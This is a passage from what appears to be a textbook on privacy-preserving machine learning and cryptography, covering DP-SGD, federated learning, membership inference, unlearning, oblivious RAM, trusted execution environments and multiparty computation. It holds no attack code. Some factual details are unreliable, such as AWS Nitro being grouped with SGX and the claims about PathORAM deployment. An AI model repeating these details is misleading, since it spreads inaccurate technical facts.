- Sample a mini-batch \(B_t\) with probability \(q = |B|/N\).
- For each example \(x_i \in B_t\), compute gradient \(g_i = \nabla_\theta L(\theta; x_i)\).
- Clip: \(\bar{g}_i = g_i / \max(1, \|g_i\|_2 / C)\) where \(C\) is the clipping norm.
- Add noise: \(\tilde{g} = \frac{1}{|B|}\left(\sum_i \bar{g}_i + \mathcal{N}(0, \sigma^2 C^2 I)\right)\).
- Update: \(\theta_{t+1} = \theta_t - \eta \tilde{g}\).
18.2 Federated Learning
Federated learning (McMahan et al. 2017) trains a model across decentralised devices (phones, hospitals) without centralising the raw data. Each round:
- A central server sends the current model \(\theta_t\) to a subset of devices.
- Each device trains locally on its data for \(E\) epochs, producing a local model update \(\Delta_i = \theta_t' - \theta_t\).
- The server aggregates updates: \(\theta_{t+1} = \theta_t + \frac{1}{K}\sum_i \Delta_i\) (FedAvg).
- Repeat until convergence.
Federated learning reduces data centralisation but does not provide privacy by itself: gradient updates can leak significant information about training data through gradient inversion attacks (Zhu et al. 2019 showed that individual training images can be reconstructed from a single gradient update to near-perfect accuracy). The combination of federated learning with DP-SGD (called federated DP) provides the strongest practical guarantee: local DP applied before aggregation, or central DP applied to the aggregated gradients. Apple uses federated DP for keyboard next-word prediction and emoji suggestions on iOS, with published privacy parameters (\(\epsilon \approx 2\) per day per user).
18.3 Membership Inference Attacks
Membership inference attacks (Shokri et al. 2017) determine whether a specific record was in a model’s training set, given black-box access to the model. The attack trains a meta-classifier on the distinction between “member” (training set) and “non-member” (test set) behaviour: models tend to have higher confidence on training examples (overfitting). ML models trained without privacy guarantees can leak substantial membership information — attack success rates of 60–80% have been demonstrated on production models (including a GPT-2 fine-tuned on medical notes).
Differential privacy directly mitigates membership inference: \(\epsilon\)-DP implies that the membership inference advantage of any adversary is bounded by \(e^\epsilon - 1\). For small \(\epsilon\) (strong privacy), membership inference is essentially no better than random guessing.
18.4 Machine Unlearning
Privacy regulations (GDPR right to erasure, CCPA deletion right) create a legal obligation to delete an individual’s data from trained models — so-called machine unlearning. Exact unlearning (retraining from scratch without the deleted record) is computationally feasible for small models but prohibitive for large neural networks trained on billions of records. Approximate unlearning algorithms (SISA training: sharded-isolated-sliced-aggregated; gradient ascent on the deleted records; Newton’s method in function space) aim to achieve unlearning with significantly less computation. The soundness of approximate unlearning — whether the post-unlearning model is genuinely statistically indistinguishable from a model trained without the record — remains an active research question, and no algorithm has been formally certified under GDPR compliance. This gap between the legal obligation and the technical reality is a significant open problem at the intersection of ML and privacy law.
Chapter 19: Oblivious RAM and Private Computation
19.1 Oblivious RAM
When a client outsources storage to an untrusted server, the server can observe which memory locations are accessed, even if the stored data is encrypted. Access patterns can reveal significant information: the sequence of database lookups reveals which records were queried; the sequence of file accesses reveals browsing history or document structure.
Oblivious RAM (ORAM) (Goldreich-Ostrovsky 1987, 1996) is a cryptographic primitive that hides access patterns. An ORAM scheme allows a client to read and write a remote array of \(N\) blocks such that the server observes a sequence of accesses that is statistically independent of the logical access pattern, regardless of the data and logical access sequence.
The PathORAM scheme (Stefanov et al. 2013) achieves \(O(\log^2 N)\) bandwidth overhead and is practically deployed in TrustZone and SGX enclaves for private database queries. The construction organises server storage as a binary tree of “buckets”; each logical access reads and rewrites a complete root-to-leaf path, shuffling the block to a new random position. This ensures the server sees uniformly random paths regardless of which logical block is accessed.
19.2 Trusted Execution Environments
Trusted Execution Environments (TEEs) provide hardware-enforced isolation: a secure enclave executes code and holds data in encrypted memory, shielded from the host OS, hypervisor, and other processes. Even the hardware manufacturer cannot read enclave memory after deployment (ideally).
- Intel SGX (Software Guard Extensions): creates encrypted enclaves in user space. Remote attestation allows a remote party to verify the enclave’s code hash and hardware identity, establishing trust. SGX has been extensively attacked via side channels (cache timing, speculative execution — Foreshadow), but remains widely deployed in cloud confidential computing (Microsoft Azure, AWS Nitro).
- ARM TrustZone: splits the processor into Normal World (untrusted OS) and Secure World (trusted OS for sensitive operations — biometric data, payment keys, DRM). Used in nearly all smartphones.
- AMD SEV (Secure Encrypted Virtualisation): encrypts the memory of entire virtual machines, protecting tenant data from a compromised hypervisor. SEV-SNP (2021) adds integrity guarantees and attestation.
TEEs enable confidential computing — cloud customers can process sensitive data in the cloud without trusting the cloud provider’s infrastructure, verified by remote attestation. The NIST Cybersecurity Framework 2.0 (2024) explicitly references TEEs as a control for sensitive data processing in untrusted environments.
19.3 Secure Multiparty Computation in Practice
The Yao garbled circuit protocol (Chapter 8) handles two-party computation; for \(n > 2\) parties, the BGW protocol provides information-theoretic MPC. In practice, the main deployment challenges are:
Communication complexity: BGW requires \(O(n^2)\) point-to-point messages per gate for an \(n\)-party computation. For large \(n\) (hundreds of parties), broadcast-based protocols and secret-sharing optimisations reduce this. The SPDZ protocol (Damgård et al.) uses preprocessing (offline) plus fast online evaluation, achieving near-linear communication in \(n\) for the online phase.
Deployment: Notable real-world MPC deployments: (1) The Danish Sugar Beet auction (2008) — first commercial MPC deployment; (2) Privacy-preserving set intersection for COVID contact tracing in PEPP-PT and DP3T; (3) Boston Equal Pay study (2017) — Azer et al. used MPC to compute salary statistics across companies without revealing individual company data, publishing evidence of gender wage gaps while maintaining employer confidentiality.
The gap between MPC research and practice is narrowing. Modern frameworks (MOTION, SCALE-MAMBA, MP-SPDZ) enable non-experts to implement MPC protocols with security proofs. The main remaining barriers are latency (MPC typically requires multiple rounds of interaction, each adding network RTT) and the need for secure channels between all parties, which requires a PKI or out-of-band key exchange before computation begins.